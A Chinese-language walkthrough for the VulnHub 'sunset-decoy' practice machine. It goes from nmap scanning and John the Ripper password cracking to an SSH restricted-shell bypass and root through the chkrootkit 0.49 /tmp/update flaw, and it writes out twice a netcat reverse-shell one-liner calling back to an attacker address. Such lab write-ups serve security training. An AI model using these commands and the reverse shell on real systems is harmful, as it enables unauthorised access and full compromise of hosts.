"我曾想隐归于世,却发现本就无人问津"
项目靶机地址:
https://www.vulnhub.com/entry/sunset-decoy,505
0x00:主机发现:
sudo nmap -sP 192.168.33.1/24
目标IP:192.168.33.131
0x01:端口信息收集:
sudo nmap -sC -sV 192.168.33.131
访问80端口:
其中的save.zip 下载解压下来
使用密码爆破 看看解压密码能否爆破
zip2john save.zip >> passwd.txt
john passwd.txt
发现压缩包里面是加密的帐号密码:
目录扫描:
sudo gobuster dir -u http://192.168.33.131 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium
John解密上述的压缩包文件:
john --wordlist=/usr/share/wordlists/rockyou.txt shadow
账号:296640a3b825115a47b68fc44501c828
密码:server
SSH登录:
ssh 192.168.33.131 -l 296640a3b825115a47b68fc44501c828
server
发现该shell被限制 很多命令无法执行:
ssh bypass:
-t "bash --noprofile"
强制分配伪终端. 可以在远程机器上执行任何全屏幕(screen-based)程序, 所以非常有用, 例如菜单服务. 并联的 -t 选项强制分配终端,即使 没有本地终端.当 ssh 连接时是一个限制的 shell,可以使用此参数绕过限制
ssh 296640[email protected]168.33.131 -t "bash --noprofile"
echo $PATH
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
Chkrootkit 0.49 本地提权漏洞:
发现一个 pspy 运行后的记录文件,记录了一个压缩包解压命令:
而 chkrootkit 有 0.49 以下版本有本地提权漏洞,先查找一下 poc
searchsploit chkrootkit
33899.txt 提示只要在/tmp 目录下有一个 update 的可执行文件,那么运行 chkrootkit 的时候会以 root 权限运行/tmp/update 文件,那么我们只需要写入一个反弹 shell 即可
cd /tmp
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.33.150 4444>/tmp/f" > update
chmod 777 update
攻击机监听
nc -lvvp 4444
这个 chkrootkit0.49 是存在本地提权漏洞的,但是需要运行 chkrootkit,日志文件中是没有的,前面家目录下还有一个honeypot.decoy 是有运行权限的,运行之后有 8 个选项,其他七个都没什么用,第五个会启动一个 AV SCAN,这个应该就是启动chkrootkit 了.
提权成功
反弹 shell 的时候看下有没有 nc,如果有尽量使用
which nc
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.33.150 4444>/tmp/f" > update